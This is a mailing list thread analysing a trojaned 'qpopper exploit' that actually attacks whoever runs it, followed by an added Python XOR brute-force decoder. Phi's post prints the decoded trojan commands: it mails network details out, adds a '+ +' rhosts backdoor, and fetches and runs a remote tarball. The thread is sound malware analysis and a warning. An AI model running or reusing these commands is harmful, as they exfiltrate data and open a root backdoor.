Vulnerability Development mailing list archives

Re: QPOP2.5* exploit ??


From: llmora () S21SEC COM (Lluis Mora)
Date: Mon, 15 May 2000 10:23:43 +0200


> I have yet to totally decode the asm, and don't think I will bother to go
> any further, so it is possible it does more than just this, however it
> quite obviously isn't a straight qpopper exploit. Anyone tried against a
> qpopper install to see if it executes?

If I were you I wouldn't give it a try, as all it does is execute the
shellcode _locally_ (on the box trying to run the exploit), not on the remote
machine. It's a trojan, as has been previously noticed by rpc <h () ckz org>.

(char *)qpop_proc = shellcode; /* Points the qpop_proc function to the
shellcode */

[...]

/* Tries an always unsuccessful exploit */

[...]

quit(0); /* Before exiting, it executes quit() */

void quit(int x)
{
     qpop_proc(); /* which contains a call to the shellcode, executed in the
local machine */
     exit(x);
}

Cheers,

Lluis Mora              llmora () s21sec com

-----Original Message-----
From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM] On Behalf Of
phi-vulndev () EXORSUS NET
Sent: Monday, 15 May 2000 2:36
To: VULN-DEV () SECURITYFOCUS COM
Subject: Re: QPOP2.5* exploit ??

This has been found in the wild, however there seems to be a trojan
in the shellcode.  Popper 2.5* has been thought to be safe.  I would not
recommend running this on your own machine unless you crack the
shellcode and see what it does.

Trivial xor of 2 encoding of part of the shellcode reveals:

/bin/sh -c
/sbin/ifconfig -a | mail -s solwar etcownz () hotmail com >> /dev/null;
echo '+ +' >> ~root/.rhosts;
rcp lp () skinner trdlnk com:/usr/spool/lp/model/solwar.tar solwar.tar;
tar -xvf solwar* >> /dev/null;
cd solwar;
chmod +x solwar.sh;
./solwar.sh >> /dev/null;
cd ..;
rm -rf solwar*;

I have yet to totally decode the asm, and don't think I will bother to go
any further, so it is possible it does more than just this, however it
quite obviously isn't a straight qpopper exploit. Anyone tried against a
qpopper install to see if it executes?

Phi.
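As an added example that is not part of either post, the following Python script reproduces the "trivial xor of 2" decoding step Phi describes and extends it to a brute force over all 255 single-byte keys, scanning each decoding for a printable command string the way strings(1) would. The payload bytes, the command text and every function name here are constructed for illustration; the real exploit's shellcode is not reproduced.

```python
XOR_KEY = 2  # the "trivial xor of 2" encoding named in the post

# Constructed sample payload (NOT the real exploit's shellcode): a few
# opaque filler bytes, a harmless command string XOR-encoded with key 2,
# and more filler, so the string is not visible to a plain strings(1) scan.
SAMPLE_COMMAND = b"/bin/sh -c echo trojan-check >> /dev/null;"
SAMPLE_PAYLOAD = (
    bytes([0x31, 0xC0, 0x99, 0xB0, 0x0B])
    + bytes(b ^ XOR_KEY for b in SAMPLE_COMMAND)
    + bytes([0xCD, 0x80, 0x00])
)


def xor_decode(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key; XOR is its own inverse."""
    return bytes(b ^ key for b in data)


def printable_strings(data: bytes, min_len: int = 6) -> list:
    """Runs of printable ASCII at least min_len bytes long, like strings(1)."""
    found, run = [], bytearray()
    for b in data + b"\x00":  # trailing NUL sentinel flushes the last run
        if 0x20 <= b < 0x7F:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    return found


def recover_commands(payload: bytes, marker: str = "/bin/sh") -> dict:
    """Try every single-byte XOR key and keep the keys whose decoding
    exposes a printable string containing `marker`.  Returns {key: [str]}."""
    hits = {}
    for key in range(1, 256):
        exposed = [s for s in printable_strings(xor_decode(payload, key))
                   if marker in s]
        if exposed:
            hits[key] = exposed
    return hits


if __name__ == "__main__":
    print("before decoding:", printable_strings(SAMPLE_PAYLOAD))
    for key, strings in recover_commands(SAMPLE_PAYLOAD).items():
        print(f"key 0x{key:02x} exposes:", strings)
```

Run against a real dump, the undecoded strings scan shows only garbled runs, while the key that exposes a "/bin/sh" string is the one to inspect further.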

